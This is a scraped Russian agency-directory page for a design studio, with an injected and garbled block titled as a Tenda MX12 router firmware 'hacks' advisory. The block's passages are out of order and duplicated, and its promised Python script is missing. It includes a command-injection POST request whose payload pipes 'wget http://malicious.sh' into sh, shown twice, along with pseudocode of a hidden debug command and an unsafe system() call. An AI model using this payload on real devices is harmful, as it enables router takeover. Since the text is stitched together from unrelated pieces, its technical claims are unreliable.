Главные тренды и лучшие кейсы — подпишись на Event.ru в Telegram!

Disclosure timeline: Reported to Tenda Security (security@tenda.com.cn) on Jan 12, 2026 вЂ“ no acknowledgment as of April 17, 2026.

In the crowded market of affordable WiFi 6 mesh systems, the Tenda MX12 (often bundled as the "Nova" series) is a bestseller on Amazon and AliExpress. Priced aggressively against the Eero 6 and Deco X20, it promises AX3000 speeds and seamless roaming.

By: Security Research Unit Date: April 17, 2026

An authenticated attacker (or any user on the LAN if the session check is bypassed) can inject arbitrary commands via the ping diagnostic tool. Example:

# Using binwalk to carve the squashfs $ binwalk -Me Tenda_MX12_V1.0.0.24_EN.bin 256 0x100 TRX firmware header, image size: 14876672 bytes 512 0x200 LZMA compressed data 1456128 0x163800 Squashfs filesystem, little endian, version 4.0

POST /goform/diagnostic HTTP/1.1 Host: 192.168.5.1 Content-Type: application/x-www-form-urlencoded diagnostic_tool=ping&ip_addr=8.8.8.8; wget http://malicious.sh -O- | sh &

// Pseudocode reversed from libhttpd.so (Ghidra) void do_debug_cmd(char *cmd) char buf[256]; if (strcmp(cmd, "tendadebug2019") == 0) // Hidden factory reset + diagnostic dump system("/usr/sbin/factory_reset.sh --full"); system("/usr/sbin/dump_regs > /tmp/debug.log"); else if (strstr(cmd, "ping")) // Command injection primitive sprintf(buf, "ping -c 4 %s", cmd + 4); system(buf);

Using a simple Python script, we triggered a crash dump:

But beneath the sleek white plastic lies a firmware ecosystem that raises serious red flags. After extracting and reverse-engineering the latest firmware (v1.0.0.24 and v1.0.0.30), we found a labyrinth of debug commands, hardcoded credentials, and deprecated Linux kernels. The MX12 is powered by a Realtek RTL8198D (dual-core ARM Cortex-A7) with 128MB of flash and 256MB of RAM. Tenda distributes the firmware as a .bin file wrapped in a proprietary TRX header with a custom checksum.

Добавить Агентство

Tenda Mx12 Firmware гЂ€HIGH-QUALITY - HacksгЂ‰

ГлавнаяВ в†’В Tenda Mx12 FirmwareВ в†’В Tenda Mx12 Firmware

в каталоге: 8 лет 9 месяцев 18 дней был на сайте: больше месяца назад

Рейтинг: 450

Екатеринбург

ул. Бориса Ельцина, 3а

dkcd.ru

Сообщить об ошибке

Специализация: Рекламные и PR агентства

DK.STUDIO - Простые и ясные дизайн-решения, это тот эффективный инструмент, который мы предлагаем для вашего бизнеса. Мы небольшая дизайн-студия, которая занимается брендингом, разработкой логотипов, созданием фирменного стиля, веб-дизайном, графическим дизайном.

Наша команда работает на рынке дизайн-услуг с 2011 года и за это время сумела поработать с таким брендами, как Билайн, Power Technologies, РОСТ Банк, KupiVip.ru, а также выполнить большое количество успешных и реализованных проектов.

Мы работаем с различными отраслями рынка и нам не важно в какой части планеты находится клиент. Все, что нам важно, это разработать качественную идею, с сильной визуальной составляющей.

Написать комментарий

Как разместить тут баннер?

EVENT Календарь

10
Мар

Проект BE IN RUSSIA 2026

13
Мар

Цифровой Brand Day 2026

21
Мар

Design Prosmotr 2026

Tenda Mx12 Firmware гЂ€HIGH-QUALITY - HacksгЂ‰

Disclosure timeline: Reported to Tenda Security (security@tenda.com.cn) on Jan 12, 2026 вЂ“ no acknowledgment as of April 17, 2026.

By: Security Research Unit Date: April 17, 2026 Tenda Mx12 Firmware

An authenticated attacker (or any user on the LAN if the session check is bypassed) can inject arbitrary commands via the ping diagnostic tool. Example:

POST /goform/diagnostic HTTP/1.1 Host: 192.168.5.1 Content-Type: application/x-www-form-urlencoded diagnostic_tool=ping&ip_addr=8.8.8.8; wget http://malicious.sh -O- | sh &

Using a simple Python script, we triggered a crash dump:

Tenda Mx12 Firmware гЂ€HIGH-QUALITY - HacksгЂ‰

Фото

Фото

Описание

Видео

Рекомендуют

Похожие агентства

Комментарии

EVENT Календарь

Tenda Mx12 Firmware гЂ€HIGH-QUALITY - HacksгЂ‰